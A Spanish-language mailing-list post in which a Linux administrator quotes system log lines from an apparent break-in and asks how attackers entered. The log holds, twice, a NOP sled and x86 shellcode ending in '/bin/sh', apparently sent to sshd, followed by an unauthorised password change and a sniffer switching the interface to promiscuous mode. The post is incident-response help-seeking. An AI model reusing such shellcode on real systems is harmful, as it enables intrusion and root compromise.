Mensajes en /var/log/messages

[Jose Antonio Galicia]

 Revisando las bitacoras encontre esto:
------------------
Oct 29 04:54:16 telnet sshd[3911]: Did not receive ident string from 200.53.243.31.
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90>1À1Û1É°FÍ<80>1À1ÛC<89>ÙA°?Í<80>ëk^1À1É<8D>^^A<88>F^Df¹ÿ^A°'Í<80>1À<8D>^^A°=Í<80>1À1Û<8D>^^H<89>C^B1ÉþÉ1À<8D>
^^H°^LÍ<80>þÉuó1À<88>F^I<8D>^^H°=Í<80>þ^N°0þÈ<88>F^D1À<88>F^G<89>v^H<89>F^L<89>ó<8D>N^H<8D>V^L°^KÍ<80>1À1Û°^AÍ<80>è<90>ÿ
ÿÿ0bin0sh1..11
Oct 29 05:01:15 telnet sshd[3957]: Did not receive ident string from 200.53.243.31.
Oct 29 05:04:02 telnet PAM_pwdb[3970]: password for (adm/3) changed by ((null)/0)
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90>1À1Û1É°FÍ<80>1À1ÛC<89>ÙA°?Í<80>ëk^1À1É<8D>^^A<88>F^Df¹ÿ^A°'Í<80>1À<8D>^^A°=Í<80>1À1Û<8D>^^H<89>C^B1ÉþÉ1À<8D>
^^H°^LÍ<80>þÉuó1À<88>F^I<8D>^^H°=Í<80>þ^N°0þÈ<88>F^D1À<88>F^G<89>v^H<89>F^L<89>ó<8D>N^H<8D>V^L°^KÍ<80>1À1Û°^AÍ<80>è<90>ÿ
ÿÿ0bin0sh1..11
Oct 29 05:11:59 telnet PAM_pwdb[3981]: password for (adm/3) changed by ((null)/0)
Oct 29 05:12:42 telnet kernel: amd uses obsolete (PF_INET,SOCK_PACKET)
Oct 29 05:12:42 telnet kernel: device eth0 entered promiscuous mode
---------------

 Imaginome un ataque, ¿tipo?

 Por de mientras ya regrese a modo no promiscuo la tarjeta, mate todo lo
que se puede matar y busque indicios pero no encuentro nada. La máquina
estaba nueva así que no pasa de ahí, la reinstalo y se acabo pero quiero
prevenir. En inet sólo estava FTP. Además estaba prendido ssh, smpt, https
y nada más.

 Despues de resetear la máquina el lsof me muestra:

	httpd    478 root    4u  IPv4    692       UDP *:1025

 Dados los síntomas, ¿por donde estan llegando?

 Saludos,
 Toño.
---
 mailto: jcgalici en cbbanorte.com.mx

---------------------------------------------------------
para salir de la lista, enviar un mensaje con las palabras
"unsubscribe ayuda" en el cuerpo a majordomo en linux.org.mx